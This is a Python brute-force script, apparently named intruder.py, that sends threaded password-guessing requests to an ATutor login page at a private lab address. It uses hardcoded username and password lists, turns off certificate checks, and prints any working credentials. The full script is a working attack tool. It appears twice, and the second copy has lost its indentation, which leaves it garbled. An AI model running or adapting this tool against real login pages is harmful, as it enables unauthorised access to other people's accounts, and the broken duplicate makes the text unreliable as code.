amriunix/intruder.py

## intruder.py
#!/usr/bin/python3

import threading
import time
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

URL = 'http://192.168.25.130:9090/login.php'
Host = 'atutor'
Users = ['Guest','Admin','Test']
Passwords = ['Pass','Admin123','Guest123','Pass','Passzord']
ErrorMsg = 'Invalid login'
found = []
wordlist = []
threads = []
i = 0
threadNumber = 3
j = 0

class botBruteForce (threading.Thread):
    def __init__(self, Wordlist):
        threading.Thread.__init__(self)
        self.Wordlist = Wordlist
    def run(self):
        bruteForce(self.Wordlist)


def bruteForce(Wordlist):
    global found
    header = {
    'Host': '{}'.format(Host),
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    }

    data = {
        'form_login_action':'true',
        'form_course_id':'0',
        'form_password_hidden':'{}'.format(Wordlist[1]),
        'p':'',
        'form_login':'{}'.format(Wordlist[0]),
        'form_password':'',
        'submit':'Login'
    }
    r = requests.post(URL, data = data, headers=header, verify=False)
    if not (ErrorMsg in r.text):
        found.append(Wordlist)

for User in Users :
    for Pass in Passwords:
        cred = [User, Pass]
        wordlist.append(cred)

for i in range(0,len(wordlist), threadNumber):
    partialist = wordlist[i:i+threadNumber]
    for t in range(threadNumber):
        threads.append(botBruteForce(partialist[t]))
        threads[t].start()
    while(threading.activeCount()>1):
        if (len(found) != 0):
            print(found)
            exit(0)
    threads = []
	#!/usr/bin/python3

	import threading
	import time
	import requests
	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

	URL = 'http://192.168.25.130:9090/login.php'
	Host = 'atutor'
	Users = ['Guest','Admin','Test']
	Passwords = ['Pass','Admin123','Guest123','Pass','Passzord']
	ErrorMsg = 'Invalid login'
	found = []
	wordlist = []
	threads = []
	i = 0
	threadNumber = 3
	j = 0

	class botBruteForce (threading.Thread):
	def __init__(self, Wordlist):
	threading.Thread.__init__(self)
	self.Wordlist = Wordlist
	def run(self):
	bruteForce(self.Wordlist)


	def bruteForce(Wordlist):
	global found
	header = {
	'Host': '{}'.format(Host),
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
	'Accept-Language': 'en-US,en;q=0.5',
	'Accept-Encoding': 'gzip, deflate',
	'Content-Type': 'application/x-www-form-urlencoded',
	}

	data = {
	'form_login_action':'true',
	'form_course_id':'0',
	'form_password_hidden':'{}'.format(Wordlist[1]),
	'p':'',
	'form_login':'{}'.format(Wordlist[0]),
	'form_password':'',
	'submit':'Login'
	}
	r = requests.post(URL, data = data, headers=header, verify=False)
	if not (ErrorMsg in r.text):
	found.append(Wordlist)

	for User in Users :
	for Pass in Passwords:
	cred = [User, Pass]
	wordlist.append(cred)

	for i in range(0,len(wordlist), threadNumber):
	partialist = wordlist[i:i+threadNumber]
	for t in range(threadNumber):
	threads.append(botBruteForce(partialist[t]))
	threads[t].start()
	while(threading.activeCount()>1):
	if (len(found) != 0):
	print(found)
	exit(0)
	threads = []